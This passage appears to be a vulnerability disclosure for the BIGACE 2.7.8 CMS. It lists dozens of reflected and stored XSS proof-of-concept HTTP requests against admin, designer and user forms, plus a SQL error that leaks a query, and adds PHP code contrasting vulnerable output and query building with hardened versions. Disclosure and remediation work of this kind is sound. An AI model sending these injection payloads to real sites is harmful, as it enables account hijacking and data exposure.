2. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D='%3e"%3e<script>alert(2)</script>&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---


3. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D='%3e"%3e%3c<script>...&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---

4. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---


5. xss

---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=

---< request >---

6. xss

---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---


7. xss

---< request >---

POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D="%20body%20onload%3d"alert(4321)"%3e&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---

8. xss

---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---

9. xss

---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---

10. xss

---< request >---

POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&data%5Bcountry%5D=
---< request >---


11. xss

---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e
---< request >---


12. xss

---< request >---
POST /bigace/public/index.php?cmd=admin&id=categoryCreate_tADMIN_len&data[parent]='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e HTTP/1.1
Host: 10.149.14.52
---< request >---

13. xss and dom-based xss
---< request >---
GET /bigace/public/index.php?cmd=application&id=-1_timages_len&browserMode=listing&jsFunc='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e HTTP/1.1
Host: 10.149.14.52
---< request >---

14. xss

---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
Content-Type: multipart/form-data; boundary=---------------------------60191211818685
Content-Length: 1500

-----------------------------60191211818685
Content-Disposition: form-data; name="mode"

upload
-----------------------------60191211818685
Content-Disposition: form-data; name="userfile[]"; filename="2ASK.txt"
Content-Type: text/plain

sialala;]
-----------------------------60191211818685
Content-Disposition: form-data; name="data[parentid]"

-1
-----------------------------60191211818685
Content-Disposition: form-data; name="data[name]"


-----------------------------60191211818685
Content-Disposition: form-data; name="data[unique_name]"


-----------------------------60191211818685
Content-Disposition: form-data; name="data[description]"


-----------------------------60191211818685
Content-Disposition: form-data; name="data[langid]"

"><script>alert(43)</script><
-----------------------------60191211818685
Content-Disposition: form-data; name="data[category][]"

-1
-----------------------------60191211818685--
---< request >---


15. xss + information disclosure

---< request >---
POST /bigace/public/index.php?cmd=admin&id=statistic_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode="%20body%20onload%3d"alert(4321)"%3e

---< request >---


Response:

<div id="darkBackground">
<form name="" action="http://10.149.14.52/bigace/public/index.php?cmd=admin&id=statistic_tADMIN_len" method="POST">
<a href="http://10.149.14.52/bigace/public/index.php?cmd=admin&id=statistic_tADMIN_len&mode=" body onload="alert(4321)">"><img src="http://10.149.14.52/bigace/public/system/style/standard/refresh.png" border="0" align="top" alt="RELOAD" /></a> <select name="mode" onChange="this.form.submit()">
<option value="index">Statistics Info</option>
<option value="last7">Last Seven Daily Averages</option>
<option value="os">OS Information</option>
<option value="browser">Browser Information</option>
<option value="bots">Search Engines</option>
<option value="visitors">Top Visitors</option>
<option value="references">Top References</option>
<option value="byYear">By Year</option>
<option value="byUrl">By URL</option>
</select>
&nbsp;&nbsp;<noscript><button type="submit">Show</button></noscript></form>
</div>
<h3 class="error">Requested Mode does not exist: " body onload="alert(4321)"><br>/var/www/bigace/system/admin/plugins/includes/statistics/.php</h3><div align="center" class="CopyrightFooter"><span class="copyright">Powered by <a href="http://www.bigace.de/" target="_blank">BIGACE 2.7.8</a>.&nbsp;All rights reserved. <br />&copy; 2002-2013 <a href="http://www.kevinpapst.de/" target="_blank">Kevin Papst</a><br /></span></div>
<!-- $Id: AdminContentFooter.tpl.html,v 1.2 2009/02/28 00:43:33 kpapst Exp $ -->


16. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)

-----------------------------7318133896418
Content-Disposition: form-data; name="mode"

upload
-----------------------------7318133896418
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream


-----------------------------7318133896418
Content-Disposition: form-data; name="data[parentid]"

"><script>alert(/x/)</script>
-----------------------------7318133896418
Content-Disposition: form-data; name="data[name]"

aaaaaaaaaaaaaaaa
-----------------------------7318133896418
Content-Disposition: form-data; name="data[unique_name]"

aaaaaaaaaaaaaaaa
-----------------------------7318133896418
Content-Disposition: form-data; name="data[description]"

aaaaaaaaaaaaaaaa
-----------------------------7318133896418
Content-Disposition: form-data; name="data[langid]"

en
-----------------------------7318133896418
Content-Disposition: form-data; name="data[category][]"

-1
-----------------------------7318133896418--
---< request >---


17. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
-----------------------------7318133896418
Content-Disposition: form-data; name="mode"

upload
-----------------------------7318133896418
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream


-----------------------------7318133896418
Content-Disposition: form-data; name="data[parentid]"

-1
-----------------------------7318133896418
Content-Disposition: form-data; name="data[name]"

'"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e
-----------------------------7318133896418
Content-Disposition: form-data; name="data[unique_name]"

aaaaaaaaaaaaaaaa
-----------------------------7318133896418
Content-Disposition: form-data; name="data[description]"

aaaaaaaaaaaaaaaa
-----------------------------7318133896418
Content-Disposition: form-data; name="data[langid]"

en
-----------------------------7318133896418
Content-Disposition: form-data; name="data[category][]"

-1
-----------------------------7318133896418--
---< request >---

18. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52

-----------------------------7318133896418
Content-Disposition: form-data; name="mode"

upload
-----------------------------7318133896418
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream


-----------------------------7318133896418
Content-Disposition: form-data; name="data[parentid]"

-1
-----------------------------7318133896418
Content-Disposition: form-data; name="data[name]"

aaaaaaaaaaaaaaaa
-----------------------------7318133896418
Content-Disposition: form-data; name="data[unique_name]"

'"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e
-----------------------------7318133896418
Content-Disposition: form-data; name="data[description]"

aaaaaaaaaaaaaaaa
-----------------------------7318133896418
Content-Disposition: form-data; name="data[langid]"

en
-----------------------------7318133896418
Content-Disposition: form-data; name="data[category][]"

-1
-----------------------------7318133896418--
---< request >---

19. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=fileAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=6&data%5Bid%5D=1&data%5Blangid%5D=en&data%5Bworkflow%5D=&data%5Bname%5D=2ASK.txt&data%5Bunique_name%5D=2ASK.txt&data%5Bmimetype%5D=cze%3b]%3c%2fscript%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&data%5Bcatchwords%5D=asdasd&data%5Bdescription%5D=asdasd
---< request >---

20. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=menuAttributes_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=6&data%5Bid%5D=-1&data%5Blangid%5D=en&data%5Bparentid%5D=-9999&data%5Bunique_name%5D=index_en.html&data%5Bname%5D=Home&data%5Bcatchwords%5D=BIGACE+WEB+CMS&data%5Bdescription%5D=Menu+TOP-LEVEL&data%5Btext_4%5D="%20body%20onload%3d"alert(4321)"%3e&data%5Btext_3%5D=displayContent&data%5Bworkflow%5D=&data%5Bnum_3%5D=0
---< request >---

III. For a logged-in 'designer' user:

1. xss
---< request >---
GET /bigace/public/index.php?cmd=admin&id=itemMenu_tADMIN_len&data[id]=-1&adminCharset='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data[langid]=en&mode=changeattrib HTTP/1.1
Host: 10.149.14.52
Connection: close
---< request >---


2. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=itemMenuCreate_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=createNewMenu&data%5BnextAdmin%5D=menuAttributes&data%5Blangid%5D=en&data%5Bparentid%5D=-1&data%5Bname%5D=asd&data%5Bcatchwords%5D=asd&data%5Bdescription%5D=asd&data%5Btext_4%5D='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&data%5Btext_3%5D=displayContent&data%5Bworkflow%5D=PublishingWorkflow&data%5Bnum_3%5D=0&data%5Bcontent%5D=
---< request >---

3. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=design_tADMIN_len&mode=update&hashtoken=0cbbd0bec2522717655d2458877c750b HTTP/1.1
Host: 10.149.14.52
Content-Length: 214

designName=BIGACE-REDIRECT&description=Redirects+to+the+URL+in+the+Menus+Catchwords.&template=REDIRECT&stylesheet=dummy_stylesheet&portletColumns='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&contents=asd
---< request >---


IV. For a logged-in admin:

1. xss
---< request >---
GET /bigace/public/index.php?cmd=admin&id=itemMenuCreate_tADMIN_len&data[id]=-1&data[nextAdmin]='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e HTTP/1.1
Host: 10.149.14.52
---< request >---

Response:

<form name="MenuValues" onSubmit="return checkCreateForm();" action="http://10.149.14.52/bigace/public/index.php?cmd=admin&id=itemMenuCreate_tADMIN_len" method="POST">
<input type="hidden" name="mode" value="createNewMenu">
<input type="hidden" name="data[nextAdmin]" value="'>"><img/src="x"/onerror="alert(4321)">">


2. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
Content-Type: multipart/form-data; boundary=---------------------------309932421512500
Content-Length: 1022

-----------------------------309932421512500
Content-Disposition: form-data; name="mode"

upload
-----------------------------309932421512500
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream


-----------------------------309932421512500
Content-Disposition: form-data; name="data[parentid]"

a"><script>alert(1)</script>
-----------------------------309932421512500
Content-Disposition: form-data; name="data[name]"

aaaaaaaaaaaaa
-----------------------------309932421512500
Content-Disposition: form-data; name="data[unique_name]"

aaaaaaaaaaaaaaaaaaa
-----------------------------309932421512500
Content-Disposition: form-data; name="data[description]"

aaaaaaaaaaaaaaaaaaaaaaa
-----------------------------309932421512500
Content-Disposition: form-data; name="data[langid]"

en
-----------------------------309932421512500
Content-Disposition: form-data; name="data[category][]"

-1
-----------------------------309932421512500--
---< request >---


3. same request, parameter data[name] (xss too)

4. same for parameters data[unique_name] and data[description].


For data[description], to reproduce it you must first break out of the <textarea> tag, so
the payload should be similar to this one:
</textarea><script>alert(2)</script>
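The response in item 1 shows the request value reflected verbatim into a value="" attribute, and items 3 and 4 show the same thing inside a <textarea>. As an added example (not BIGACE's code), here is that reflection written as the vulnerable pattern beside a hardened version that encodes for the HTML context the value lands in. The inputs are the two payloads from the report, the function names are my own.

```php
<?php
// Added example, not code from BIGACE: the reflection shown above, first as
// the vulnerable pattern and then hardened with context-aware encoding.

// Constructed inputs: the attribute-breaking payload from item 1 and the
// <textarea>-breaking payload from item 4.
$nextAdmin   = '\'>"><img/src="x"/onerror="alert(4321)">';
$description = '</textarea><script>alert(2)</script>';

// Vulnerable: the raw value is concatenated into an attribute and into a
// textarea, so a quote ends the attribute and "</textarea>" ends the element.
function render_vulnerable(string $nextAdmin, string $description): string
{
    return '<input type="hidden" name="data[nextAdmin]" value="' . $nextAdmin . "\">\n"
         . '<textarea name="data[description]">' . $description . '</textarea>';
}

// Hardened: encode for the context the value is written into. ENT_QUOTES
// turns both ' and " into entities so the value cannot close the attribute;
// < and > become &lt; and &gt;, so "</textarea>" stays plain text.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function render_hardened(string $nextAdmin, string $description): string
{
    return '<input type="hidden" name="data[nextAdmin]" value="' . h($nextAdmin) . "\">\n"
         . '<textarea name="data[description]">' . h($description) . '</textarea>';
}

echo "--- vulnerable ---\n", render_vulnerable($nextAdmin, $description), "\n";
echo "--- hardened ---\n",   render_hardened($nextAdmin, $description), "\n";
```

Encoding at output time is the minimum fix for every reflected field in this list. For a field like data[nextAdmin], which selects the next admin screen, comparing the value against the known set of screen names and rejecting anything else is stronger still, because the value then never reaches the template at all.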

5. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=itemMenuCreate_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=createNewMenu&data%5BnextAdmin%5D=itemMenu&data%5Blangid%5D=en&data%5Bparentid%5D=-1&data%5Bname%5D=aaaaaaaaaaaa&data%5Bcatchwords%5D=aaaaaaaaaaaaaaaaaaaaaa&data%5Bdescription%5D=aaaaaaaaaaaaa&data%5Btext_4%5D='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&data%5Btext_3%5D=displayContent&data%5Bworkflow%5D=&data%5Bnum_3%5D=0&data%5Bcontent%5D=
---< request >---

6. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
Content-Type: multipart/form-data; boundary=---------------------------47528326907
Content-Length: 1420

-----------------------------47528326907
Content-Disposition: form-data; name="mode"

upload
-----------------------------47528326907
Content-Disposition: form-data; name="userfile[]"; filename="2ASK.txt"
Content-Type: text/plain

sialala;]
-----------------------------47528326907
Content-Disposition: form-data; name="data[parentid]"

-1
-----------------------------47528326907
Content-Disposition: form-data; name="data[name]"


-----------------------------47528326907
Content-Disposition: form-data; name="data[unique_name]"


-----------------------------47528326907
Content-Disposition: form-data; name="data[description]"


-----------------------------47528326907
Content-Disposition: form-data; name="data[langid]"

"><script>alert(3)</script>
-----------------------------47528326907
Content-Disposition: form-data; name="data[category][]"

-1
-----------------------------47528326907--
---< request >---

7. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=fileAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=6&data%5Bid%5D=1&data%5Blangid%5D=en&data%5Bworkflow%5D=&data%5Bname%5D=2ASK.txt&data%5Bunique_name%5D=2ASK.txt&data%5Bmimetype%5D="><script>alert(9)</script>&data%5Bcatchwords%5D=aaaaaaaaaaaaaa&data%5Bdescription%5D=aaaaaaaaaaaaaaaaaaaaaaa
---< request >---

8. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len&mode=addToGroup HTTP/1.1
Host: 10.149.14.52

data%5Bid%5D=3&data%5Bgroup%5D=%27%3e%22%3e%3c%69%6d%67%2f%73%72%63%3d%22%78%22%2f%6f%6e%65%72%72%6f%72%3d%22%61%6c%65%72%74%28%34%33%32%31%29%22%3e
---< request >---


9. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=3&data%5Bfirstname%5D=&data%5Blastname%5D='"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---


10. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=3&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D='"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---


11. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=3&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D='"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---


12. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=3&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D='"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---

13. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 1048

-----------------------------12326531612573
Content-Disposition: form-data; name="mode"

importFiles
-----------------------------12326531612573
Content-Disposition: form-data; name="importURLs"

asdasdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[parentid]"

"><script>alert(234)</script>
-----------------------------12326531612573
Content-Disposition: form-data; name="data[name]"

asdasdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="namingType"

namingFile
-----------------------------12326531612573
Content-Disposition: form-data; name="data[unique_name]"

asd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[description]"

asdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[langid]"

en
-----------------------------12326531612573
Content-Disposition: form-data; name="data[category][]"

-1
-----------------------------12326531612573--
---< request >---


14. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=3&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---

15. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=3&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---

16. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=3&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&data%5Bcountry%5D=
---< request >---

17. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=3&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e
---< request >---


18. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
Content-Type: multipart/form-data; boundary=---------------------------12326531612573
Content-Length: 1039

-----------------------------12326531612573
Content-Disposition: form-data; name="mode"

importFiles
-----------------------------12326531612573
Content-Disposition: form-data; name="importURLs"

asdasdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[parentid]"

-1
-----------------------------12326531612573
Content-Disposition: form-data; name="data[name]"

"><script>alert(2)</script>
-----------------------------12326531612573
Content-Disposition: form-data; name="namingType"

namingFile
-----------------------------12326531612573
Content-Disposition: form-data; name="data[unique_name]"

asd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[description]"

asdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[langid]"

en
-----------------------------12326531612573
Content-Disposition: form-data; name="data[category][]"

-1
-----------------------------12326531612573--
---< request >---

19. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 1045

-----------------------------12326531612573
Content-Disposition: form-data; name="mode"

importFiles
-----------------------------12326531612573
Content-Disposition: form-data; name="importURLs"

asdasdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[parentid]"

-1
-----------------------------12326531612573
Content-Disposition: form-data; name="data[name]"

asdasdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="namingType"

namingFile
-----------------------------12326531612573
Content-Disposition: form-data; name="data[unique_name]"

"><script>alert(3)</script>
-----------------------------12326531612573
Content-Disposition: form-data; name="data[description]"

asdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[langid]"

en
-----------------------------12326531612573
Content-Disposition: form-data; name="data[category][]"

-1
-----------------------------12326531612573--
---< request >---

20. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 1053

-----------------------------12326531612573
Content-Disposition: form-data; name="mode"

importFiles
-----------------------------12326531612573
Content-Disposition: form-data; name="importURLs"

asdasdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[parentid]"

-1
-----------------------------12326531612573
Content-Disposition: form-data; name="data[name]"

asdasdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="namingType"

namingFile
-----------------------------12326531612573
Content-Disposition: form-data; name="data[unique_name]"

asd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[description]"

"></textarea><script>alert(2)</script>
-----------------------------12326531612573
Content-Disposition: form-data; name="data[langid]"

en
-----------------------------12326531612573
Content-Disposition: form-data; name="data[category][]"

-1
-----------------------------12326531612573--
---< request >---

21. SQL Injection

<td valign="top">MySQL error (1064:
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near 'x"/onerror="alert(4321)">'' at
line 1) for [SELECT count(id) as amount FROM cms_item_future WHERE itemtype='1' AND
id='-1' AND cid='1' AND language=''>"><img/src="x"/onerror="alert(4321)">'
;]

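The error text above shows the injected value landing, still quoted, inside the language='...' clause, and the whole query being echoed back to the browser. As an added example that is not BIGACE's code, here is that query built by string concatenation beside a version that uses PDO prepared statements plus an allow-list for the language code. The table and column names are taken from the error message; the SQLite in-memory database and its rows are constructed so the example runs offline.

```php
<?php
// Added example (not BIGACE code). Table and column names come from the
// error message on the page; the SQLite in-memory database and rows are
// constructed so the example runs offline.

function count_items_vulnerable(PDO $db, string $itemtype, string $id, string $cid, string $language): int
{
    // Concatenation: a quote in $language rewrites the query, and the raw
    // SQL (payload included) ends up in the error message shown to the user.
    $sql = "SELECT count(id) as amount FROM cms_item_future WHERE itemtype='$itemtype' "
         . "AND id='$id' AND cid='$cid' AND language='$language'";
    return (int) $db->query($sql)->fetchColumn();
}

function count_items_hardened(PDO $db, string $itemtype, string $id, string $cid, string $language): int
{
    // Language codes are a closed set, so reject anything that does not look
    // like one before it gets near the database.
    if (!preg_match('/^[a-z]{2,3}(-[A-Za-z]{2,4})?$/', $language)) {
        throw new InvalidArgumentException('invalid language code');
    }
    // Bound parameters are sent as values and never parsed as SQL.
    $stmt = $db->prepare(
        'SELECT count(id) AS amount FROM cms_item_future '
      . 'WHERE itemtype = :itemtype AND id = :id AND cid = :cid AND language = :language'
    );
    $stmt->execute([
        ':itemtype' => $itemtype,
        ':id'       => $id,
        ':cid'      => $cid,
        ':language' => $language,
    ]);
    return (int) $stmt->fetchColumn();
}

// Demo database (constructed).
$db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$db->exec('CREATE TABLE cms_item_future (id INTEGER, itemtype TEXT, cid TEXT, language TEXT)');
$db->exec("INSERT INTO cms_item_future VALUES (1, '1', '1', 'en'), (2, '1', '1', 'de')");

// The payload from the report, as it reached the query.
$payload = '\'>"><img/src="x"/onerror="alert(4321)">';

echo "hardened count for 'en': ", count_items_hardened($db, '1', '1', '1', 'en'), "\n";

try {
    count_items_vulnerable($db, '1', '1', '1', $payload);
} catch (PDOException $e) {
    // Log this server-side; never render $e->getMessage() into the page.
    echo "vulnerable query failed with a syntax error\n";
}

try {
    count_items_hardened($db, '1', '1', '1', $payload);
} catch (InvalidArgumentException $e) {
    echo "hardened query rejected the input: ", $e->getMessage(), "\n";
}
```

Two things are wrong in the original error page, and the example addresses both: the value is part of the SQL grammar (fixed by binding), and the database error text, with the query and the payload inside it, is rendered to the visitor (fixed by catching the exception, logging it, and showing a generic message).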
22. xss
---< request >---
